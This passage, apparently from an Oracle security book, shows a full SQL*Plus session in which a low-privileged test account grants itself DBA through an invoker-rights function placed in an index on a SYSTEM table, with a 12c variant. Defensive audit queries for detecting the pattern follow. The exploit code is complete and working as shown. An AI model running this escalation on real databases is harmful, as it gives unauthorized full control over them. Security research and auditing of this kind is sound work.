Now we escalate the test account to DBA through an index on SYSTEM's PUP table:
SQL*Plus: Release 11.2.0.2.0 Production on Wed Dec 11 09:47:26 2013
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> conn test/o
Connected.
SQL> CREATE OR REPLACE FUNCTION test.Y (GASP VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID
CURRENT_USER IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN 'GASP';
END;
/
Function created.
SQL> grant execute on test.y to public;
Grant succeeded.
SQL> create index system.escalation_index on system.SQLPLUS_PRODUCT_PROFILE(test.y('name'));
Index created.
SQL> set role dba;
Role set.
The interesting point of this exploit is that it does not require SELECT privilege on the indexed table to execute
the function with the privileges of the table owner. This is new attack research by the author, original to
this topic.
The previous exploit is reliable on 11g but needs the addition of this command on 12c:
grant inherit privileges on user system to test;
So in this respect, 12c is a significant security improvement over 11g. However, in terms of mainstream
privileged access control, the main threat is still present, as you will see in Chapter 14. Table 13-2 categorizes the
main privileged account management strategies in descending order of security risk, with the first strategy being
the riskiest. It is a listing of separate categories, but also a development process moving from the top to the bottom
through a maturity model. Systems go from development to production from 1 to 6 in the previous table. Which of the
following categories does your organization fit into?
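Returning to the index-based escalation shown earlier on this page, the following audit queries are an added example, not taken from the original text, that a DBA can run to look for the same pattern: a function-based index whose function belongs to a different schema than the indexed table. They assume DBA-level access to the data dictionary and that the index-to-function dependency is recorded in DBA_DEPENDENCIES; the INHERIT PRIVILEGES query applies to 12c only.

```sql
-- Added audit example (not from the original page). Run as a DBA.

-- 1. Function-based indexes that call a standalone function owned by a
--    schema other than the table owner. The session above would show up
--    as an index on SYSTEM.SQLPLUS_PRODUCT_PROFILE depending on TEST.Y.
--    Assumption: the dependency appears in DBA_DEPENDENCIES with
--    TYPE = 'INDEX' and REFERENCED_TYPE = 'FUNCTION'.
SELECT d.owner            AS index_owner,
       d.name             AS index_name,
       i.table_owner,
       i.table_name,
       d.referenced_owner AS function_owner,
       d.referenced_name  AS function_name,
       p.authid,          -- CURRENT_USER marks an invoker-rights function
       p.deterministic,
       o.created          AS index_created
FROM   dba_dependencies d
JOIN   dba_indexes i
       ON  i.owner = d.owner
       AND i.index_name = d.name
JOIN   dba_objects o
       ON  o.owner = d.owner
       AND o.object_name = d.name
       AND o.object_type = 'INDEX'
LEFT JOIN dba_procedures p
       ON  p.owner = d.referenced_owner
       AND p.object_name = d.referenced_name
       AND p.procedure_name IS NULL
WHERE  d.type = 'INDEX'
AND    d.referenced_type = 'FUNCTION'
AND    d.referenced_owner <> i.table_owner
ORDER  BY o.created DESC;

-- 2. Accounts and roles that can create an index in another schema.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'CREATE ANY INDEX'
ORDER  BY grantee;

-- 3. 12c only: who has been granted INHERIT PRIVILEGES on SYS or SYSTEM,
--    the grant the text says the escalation needs on 12c.
SELECT grantee, table_name AS on_user, grantor
FROM   dba_tab_privs
WHERE  privilege = 'INHERIT PRIVILEGES'
AND    table_name IN ('SYS', 'SYSTEM');

-- 4. Current holders of the DBA role, to compare against the approved list.
SELECT grantee, admin_option, default_role
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER  BY grantee;
```

Any row from query 1 whose function is invoker-rights and owned by a low-privileged account deserves review, together with the creation timestamp and the matching audit trail entries.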